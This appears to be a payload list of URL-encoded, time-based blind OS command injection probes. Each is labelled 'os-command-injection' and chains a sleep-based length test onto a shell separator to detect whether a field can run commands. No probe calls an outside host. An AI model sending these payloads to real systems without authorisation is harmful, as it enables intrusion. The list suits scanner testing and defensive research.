+os-command-injection,'%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%3B%20str%3D%24%28echo%20DRVINS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20SKWMFK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FXPFKU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526' +os-command-injection,'%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%0A%20str%3D%24%28echo%20QOFXCY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526' +os-command-injection,'%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%3B%20str%3D%24%28echo%20UBLMDF%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C' +os-command-injection,'%7C%20%5B%201%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%7C%20%5B%202%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%7C%20%5B%203%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%7C%20%5B%204%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%7C%20%5B%205%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%7C%20%5B%206%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%7C%20%5B%207%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%7C%20%5B%208%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%7C%20%5B%209%20-ne%20%24%28echo%20FTWOKG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSRGRG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C' +os-command-injection,'%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%0A%20str%3D%24%28echo%20YQABCF%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C' +os-command-injection,'%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%27%3B%20str%3D%24%28echo%20NSANUP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20JTXVKL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JICOQS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%27%0A%20str%3D%24%28echo%20JQNEXE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20' +os-command-injection,'%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%27%3B%20str%3D%24%28echo%20SVPWDE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27' +os-command-injection,'%27%7C%20%5B%201%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%27%7C%20%5B%202%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%27%7C%20%5B%203%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%27%7C%20%5B%204%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%27%7C%20%5B%205%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%27%7C%20%5B%206%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%27%7C%20%5B%207%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%27%7C%20%5B%208%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%27%7C%20%5B%209%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' +os-command-injection,'%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NCCVWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27' 